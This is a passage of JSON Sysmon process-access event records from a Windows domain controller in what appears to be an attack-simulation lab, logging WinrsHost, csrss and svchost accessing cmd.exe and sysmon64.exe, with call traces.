07:03:46.435","SourceProcessGUID":"{E2A3D6B1-13D2-5F25-0000-0010EF1A1200}","SourceProcessId":"4900","SourceThreadId":"2548","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{E2A3D6B1-13D2-5F25-0000-0010A11D1200}","TargetProcessId":"4988","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9228,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13D2-5F25-0000-0010A11D1200}\r\nTargetProcessId: 4988\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13D2-5F25-0000-0010A11D1200}","TargetProcessId":"4988","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9229,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9230,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9231,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9232,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9233,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9234,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9235,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
